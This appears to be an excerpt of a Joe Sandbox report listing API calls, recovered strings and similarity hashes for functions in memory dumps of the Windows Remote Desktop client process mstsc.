  • Part of subcall function 00910259: LeaveCriticalSection.KERNEL32(0096B000,?,0091011C,00000000,00000001,?,00000000,?,00000000,00000000,?,?,?,0091007F,?), ref: 009102C7
Strings
• Failed RegisterPopupParentWindowClass(FALSE), xrefs: 0091711A
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Window$CriticalDestroySection$DeleteEnterLeaveObject
• String ID: Failed RegisterPopupParentWindowClass(FALSE)
• API String ID: 557206002-2507639134
• Opcode ID: 76561b6f7c33568c5b30305638afcf8bf10966116a86dc5c040fcfe445364172
• Instruction ID: 94e511adecdb20bde884a86ec8b56e907f1fd9e0f58fce723d6292b06ada641a
• Opcode Fuzzy Hash: 76561b6f7c33568c5b30305638afcf8bf10966116a86dc5c040fcfe445364172
• Instruction Fuzzy Hash: 6831827431830A9FD7389F65C998BB6B7B9BF88315F54041DE482865B1CBB5E880DF50
APIs
Strings
• StringCchCopy failed, xrefs: 00931516, 00931560
• IMsRdpDeviceCollection::DeviceCount failed!, xrefs: 00931241
• IMsRdpClient5::get_DeviceCollection failed!, xrefs: 009311F2
• IMsRdpDevice::get_DeviceInstanceId failed, xrefs: 0093144C
• QI for IMsRdpClientNonScriptable3 failed!, xrefs: 0093118A
• IMsRdpDeviceCollection::get_DeviceByIndex failed!, xrefs: 00931497
• DynamicDevices, xrefs: 009313C3
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: memset
• String ID: DynamicDevices$IMsRdpClient5::get_DeviceCollection failed!$IMsRdpDevice::get_DeviceInstanceId failed$IMsRdpDeviceCollection::DeviceCount failed!$IMsRdpDeviceCollection::get_DeviceByIndex failed!$QI for IMsRdpClientNonScriptable3 failed!$StringCchCopy failed
• API String ID: 2221118986-430872028
• Opcode ID: 83126bc19d1210b684698790f431910ff48f53c73ea675a400a7ce0603747a00
• Instruction ID: 0988cc0a8fe5e16d1d70dc377998235d66069414cefa3bef46e770d9773773d5
• Opcode Fuzzy Hash: 83126bc19d1210b684698790f431910ff48f53c73ea675a400a7ce0603747a00
• Instruction Fuzzy Hash: DDC1B331A043189FDB29DF24C859BAA77AABF85304F00C198E445AB2B1CB75DD85DF91
APIs
• LocalAlloc.KERNEL32(00000040,0000003C,?,?,?,?,?,0093C871,00000000,?,00000000,?), ref: 0093FBCE
• memset.MSVCRT ref: 0093FBE4
• _wtol.MSVCRT ref: 0093FC56
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
• _wtol.MSVCRT ref: 0093FCC7
• _wtol.MSVCRT ref: 0093FD1A
• ??2@YAPAXI@Z.MSVCRT ref: 0093FD36
• LocalFree.KERNEL32(00000000), ref: 0093FE2E
• ??3@YAXPAX@Z.MSVCRT(0093C871), ref: 0093FE47
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: _wtol$FreeLocal$??2@??3@AddressAllocHandleLibraryModuleProcmemset
• String ID:
• API String ID: 2266593360-0
• Opcode ID: 0be121a2ba4ec8220dc122776f65acc407447f5af152be998a27c13e61a0bca2
• Instruction ID: 42915f45bfabeba92351bfac54c4d209c764bb95c9382443babc88ca22fe5d3e
• Opcode Fuzzy Hash: 0be121a2ba4ec8220dc122776f65acc407447f5af152be998a27c13e61a0bca2
• Instruction Fuzzy Hash: C481DF70A043019FDB28DF65D969F267BE5EB48700F01056CEA4A9B7E2DB78E840DF44
APIs
  • Part of subcall function 0091F727: IsWindow.USER32(?), ref: 0091F757
  • Part of subcall function 0091F727: GetWindowLongW.USER32(0091F1A5,000000F0), ref: 0091F789
  • Part of subcall function 0091F727: GetWindowLongW.USER32(0091F1A5,000000EC), ref: 0091F79D
  • Part of subcall function 0091F727: GetMenu.USER32(0091F1A5,00000000,?,?,?,0091F1A5), ref: 0091F7A3
  • Part of subcall function 0091F727: AdjustWindowRectEx.USER32(00000000,?,00000000), ref: 0091F7B5
• SetWindowTextW.USER32(?,?), ref: 0091F1CF
• SetWindowTextW.USER32(?,?), ref: 0091F1F3
• GetWindowRect.USER32(?,00000000), ref: 0091F1FE
• GetWindowLongW.USER32(?,000000F0), ref: 0091F225
• ShowWindow.USER32(?,00000009), ref: 0091F27A
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000002), ref: 0091F28D
• SetFocus.USER32 ref: 0091F2C2
• GetLastError.KERNEL32 ref: 0091F2CC
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Window$Long$RectText$AdjustErrorFocusLastMenuShow
• String ID:
• API String ID: 3365892010-0
• Opcode ID: d9609e310f732afcedafff77b130d026b1749d32620d3c2cf1d5de1c1ef4612c
• Instruction ID: b9332ccaa888a471f616262120bbe8bbc54c2e1d7dc23cbe3f37e94aff601d02
• Opcode Fuzzy Hash: d9609e310f732afcedafff77b130d026b1749d32620d3c2cf1d5de1c1ef4612c
• Instruction Fuzzy Hash: 56519FB16046089FDB14DF78CD59BBEB7F9AF88304F00452DEA96A2291CB34A841DB14
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00001088,0096A020,756F2CDC,?,009412AF,?,?,00001084,00001088), ref: 0094288D
• GetLastError.KERNEL32(?,009412AF,?,?,00001084,00001088), ref: 00942899
• LocalAlloc.KERNEL32(00000040,00000000,?,009412AF,?,?,00001084,00001088), ref: 009428F7
• memset.MSVCRT ref: 00942955
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00942969
• GetLastError.KERNEL32 ref: 00942975
• LocalFree.KERNEL32(00000000), ref: 009429CC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ByteCharErrorLastLocalMultiWide$AllocFreememset
• String ID: pDest
• API String ID: 183355994-920669795
• Opcode ID: 28ad471323ca3ddd151bc58490762b4b5f970cfb07a001d34681e62d2ab0d0b1
• Instruction ID: a34b71d2da09a5d553a27d83d501628003db24691d0914d38fa195fa084a24bd
• Opcode Fuzzy Hash: 28ad471323ca3ddd151bc58490762b4b5f970cfb07a001d34681e62d2ab0d0b1
• Instruction Fuzzy Hash: C741D1725183047FE7258FA59D59F3A3B9DFB89320F550059F900AB2A2CAB5CC40ABA4
APIs
• CreateCompatibleDC.GDI32(00000000), ref: 00937195
• GetDlgItem.USER32(?,009375DD), ref: 009371AE
• GetClientRect.USER32(00000000,?,?,?,?,?,?,009375DD,?,0096A2E0,00000005,?,?,00906D74), ref: 009371C4
• SendMessageW.USER32(009375DD,00000031,00000000,00000000), ref: 009371D7
• SelectObject.GDI32(00000000,00000000), ref: 009371E3
• DrawTextW.USER32(00000000,?,000000FF,?,00000410), ref: 009371FA
• SelectObject.GDI32(?,00000000), ref: 0093720F
• DeleteObject.GDI32(?), ref: 0093721B
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Object$Select$ClientCompatibleCreateDeleteDrawItemMessageRectSendText
• String ID:
• API String ID: 3306118528-0
• Opcode ID: 77df0c40512822ccd5ba95b7c89dcaec2ad8245eda2eda5f0be6bce4f42615e1
• Instruction ID: c29195f1aeb529aef9a8875fa7b6e5a898ab135596d627d4669b56c0ef4c1959
• Opcode Fuzzy Hash: 77df0c40512822ccd5ba95b7c89dcaec2ad8245eda2eda5f0be6bce4f42615e1
• Instruction Fuzzy Hash: 78415EB2A08209AFDB24DFE4DC84AAFBBB9AB49300F154559F911B3261C6709D50DF60
APIs
• SendMessageW.USER32(00000000,00000141,000000FF,00000000), ref: 00922B0E
• SendMessageW.USER32(00000000,00000144,00000000,00000000), ref: 00922B22
• wcsncmp.MSVCRT ref: 00922B40
• SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 00922B67
• SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00922BB9
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00922BC8
• SendMessageW.USER32(00000000,0000040E,00000000,00000001), ref: 00922BD3
• SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 00922BDD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$wcsncmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2995519212-0
                                                                                                                                                                                    • Opcode ID: 875ad86af47b68e63f037a2898ac56d79fc688405545534f84a7d07769526c07
                                                                                                                                                                                    • Instruction ID: 008062c823c0f327646fd2b55be7ec410dba2f148bdb3aa1547d3bc2a76c9187
                                                                                                                                                                                    • Opcode Fuzzy Hash: 875ad86af47b68e63f037a2898ac56d79fc688405545534f84a7d07769526c07
                                                                                                                                                                                    • Instruction Fuzzy Hash: 772107B1A443183AF725AF65AC85FBA776CEF4A754F100124FA10BA1D5C6B0CC418A69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 009393F2
                                                                                                                                                                                    • GetDlgItem.USER32(?,00001396), ref: 00939408
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00939413
                                                                                                                                                                                    • GetDlgItem.USER32(?,00001397), ref: 00939436
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00939441
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0093946F
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041F,00000000), ref: 009394A2
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,?,00939ADF,?,?,00000004), ref: 009394CE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ItemRect$ClientLongMessageScreenSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 425840078-0
                                                                                                                                                                                    • Opcode ID: a2a0bc238d32d7492b25436f40868cda21959c7ea3cdd1001f9bcfdad001bbc7
                                                                                                                                                                                    • Instruction ID: 37475fbe2637359518aceb7f758dbab40711f8fca0118be4d2ffb50e2f381679
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2a0bc238d32d7492b25436f40868cda21959c7ea3cdd1001f9bcfdad001bbc7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 33315E71A1412AAFCB14DFA8DD49BFEFBB9FB04701F044219F955A61A0CBB0A911DF90
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00911745: lstrcmpiW.KERNEL32(?,00912930,?,00000001,00911934,?,00000000,00000000,00000000,?,00000000,00912930,00000001,00912930,?,00912930), ref: 009117B5
                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 009119F8
                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 00911A13
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$lstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3586774192-0
                                                                                                                                                                                    • Opcode ID: 999be8b71ed0f35766fd0db58d665f77f3e42167a06010e39ef8a23d365c9d78
                                                                                                                                                                                    • Instruction ID: f145c9c7c69377656acae38442a600beb93116772f5bf5f2ddde6c92f38682bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 999be8b71ed0f35766fd0db58d665f77f3e42167a06010e39ef8a23d365c9d78
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7A19271B0412DAADB249B24CCC9AEDB7B9EF64300F4545AAEB09D7240E7709EC1CF91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000000,?), ref: 00952B1A
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00952BFC
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?), ref: 00952C59
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00952D0B
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00952D18
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$AllocFreeMessageTrace$ActivityControlEventmemcpy
                                                                                                                                                                                    • String ID: RecordToString failed$ppwszSettingsStore
                                                                                                                                                                                    • API String ID: 3157406721-3595829931
                                                                                                                                                                                    • Opcode ID: 4655c7724a385696d6d181ce8d7ff6a5f188292d255eea2f782a6731eee4ad29
                                                                                                                                                                                    • Instruction ID: be85268c34c4df7ec7f39e0310f963743043bf9d3bdc25ca031667c9854d82a6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4655c7724a385696d6d181ce8d7ff6a5f188292d255eea2f782a6731eee4ad29
                                                                                                                                                                                    • Instruction Fuzzy Hash: FD91B1716083419FC729CF1AD854B2A7BE9BB8A315F04489DFD849B2A2C775DC48EF42
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02302206
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                                                    • Opcode ID: 186e65ae703754714ed6adb88f136ba0293f949f578bf94831c5d2e26871bc9b
                                                                                                                                                                                    • Instruction ID: ebeee18cd4faae848ac1f85efce263eaec798453b46c58c4e1daddd5bcfbe11a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 186e65ae703754714ed6adb88f136ba0293f949f578bf94831c5d2e26871bc9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 38514A317103116BEB24DA94CCD5F6773AAAB88720F214269FD05DB2C9DB71EC42CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Dialog
                                                                                                                                                                                    • String ID: OnClickOkButton failed!$OnClickOkButton failed!. Closing the dialog.$TscProxyLinkDelSavedCreds$TscProxyLinkEditSavedCreds
                                                                                                                                                                                    • API String ID: 1120787796-1241226549
                                                                                                                                                                                    • Opcode ID: a4fa0f7c26184d705d490628f48194d6e3960b98cbea25fae299e987aba666b7
                                                                                                                                                                                    • Instruction ID: 1c6b452f365b7649f556699abe3958cd267146f0829de1aceda3575ba5a89e7b
                                                                                                                                                                                    • Opcode Fuzzy Hash: a4fa0f7c26184d705d490628f48194d6e3960b98cbea25fae299e987aba666b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A5142B120420AABCB39AF28CC55B7A76AAFF84310F048519FB569B1E1DB35DC40DF90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00912A70
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00912AEE
                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 00912B33
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Module$FileHandleNamememcpy_s
                                                                                                                                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                                                                                                                                    • API String ID: 3152089617-549000027
                                                                                                                                                                                    • Opcode ID: 93322df6726c9b6dd55222ecd3bdbe0b93dcb04c25e45a69e4857517aa776968
                                                                                                                                                                                    • Instruction ID: 6ec10aecd9c5750c54bec0f5e45aea2d41117c44fee61046c97fe69d1aea9167
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93322df6726c9b6dd55222ecd3bdbe0b93dcb04c25e45a69e4857517aa776968
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F518032B0462C9ADB20EF54DC84BEA73B8AF85710F1005A9F909E3551EB749EE4CF56
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,Alternate Full Address,?), ref: 009558DC
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,009032EC,?,?,00000000,?,Alternate Full Address,?), ref: 009559A7
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • CRdpSettingsStore::CalculateSignScopeLength failed, xrefs: 009558A9
                                                                                                                                                                                    • szSignScope, xrefs: 00955900
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$ActivityAllocControlEventFreeMessageTrace
                                                                                                                                                                                    • String ID: CRdpSettingsStore::CalculateSignScopeLength failed$szSignScope
                                                                                                                                                                                    • API String ID: 2525042477-3863715102
                                                                                                                                                                                    • Opcode ID: adfeb83e2ebbcdcf48daa14f6fa254ecbd97e9672e9036dc937335faf492c58c
                                                                                                                                                                                    • Instruction ID: 251c1a0d7590e18d7dc2bb84a9961ceaa477cc5238a63b8167efba3078c2507c
                                                                                                                                                                                    • Opcode Fuzzy Hash: adfeb83e2ebbcdcf48daa14f6fa254ecbd97e9672e9036dc937335faf492c58c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9410235604704EFCB26DF5AC864B2ABBAAEB85325F464058FC04AB363C678CC44DF91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcstok_s.MSVCRT ref: 00956295
                                                                                                                                                                                    • wcstok_s.MSVCRT ref: 009562D7
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcstok_s$ActivityControlEvent
                                                                                                                                                                                    • String ID: Field in SignScope not found in store$RecordToString failed$SignScope$SignScope field not found in store
                                                                                                                                                                                    • API String ID: 684669608-1973409768
                                                                                                                                                                                    • Opcode ID: 48a712fc927cef893e9bb27a5b807358546d7e0013c25e4919d37f311c8762f5
                                                                                                                                                                                    • Instruction ID: c85b55d2f8c787e91195ebc699d9a95e65f3b531852324ebe2996de88e93f64d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 48a712fc927cef893e9bb27a5b807358546d7e0013c25e4919d37f311c8762f5
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE416831608304AFDB1ADF56C999F2A7BADAB8135AF440058FD42A71D2CA70DD0CDBA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009211A4
                                                                                                                                                                                    • memset.MSVCRT ref: 009211B8
                                                                                                                                                                                    • SendMessageW.USER32(?,0000104B,00000000,?), ref: 009211DB
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000,?,?,?), ref: 009211EF
                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000400,00000000), ref: 00921257
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?), ref: 00921299
                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000400,00000000), ref: 009212B0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$FreeLocallstrcmpimemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2915578346-0
                                                                                                                                                                                    • Opcode ID: ee6c3512fb40b6649c17d8dbe2c6181f49ddbfa135a45e8e8e92e8a2ae7a9144
                                                                                                                                                                                    • Instruction ID: 3fe1c255e585945d21f2f67c4014d3ebb263418d73a83392bf10cd984a740dfb
                                                                                                                                                                                    • Opcode Fuzzy Hash: ee6c3512fb40b6649c17d8dbe2c6181f49ddbfa135a45e8e8e92e8a2ae7a9144
                                                                                                                                                                                    • Instruction Fuzzy Hash: 57416D71A04328FFDB259F98EC48FAE7BB9BB58301F100055F610E61A5C7B5D9A0EB54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0096317C
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003308), ref: 0096318D
                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00963194
                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00003308,?,00000200,?,?,?), ref: 009631F5
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 009631FF
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$AddressEnabledErrorFreeHandleLastLibraryMessageModuleProcTextTraceWindowmemset
                                                                                                                                                                                    • String ID: GetDlgItemText failed!
                                                                                                                                                                                    • API String ID: 3178783252-949728555
                                                                                                                                                                                    • Opcode ID: 4e2b6a5db9a498d57cd4156e828ef327e0b8756c128383c06d6f832e4c83c1b7
                                                                                                                                                                                    • Instruction ID: 22999f28dd102308afc5bd039bf3502cab112fdaa9b7dd5b692030d4eae055f8
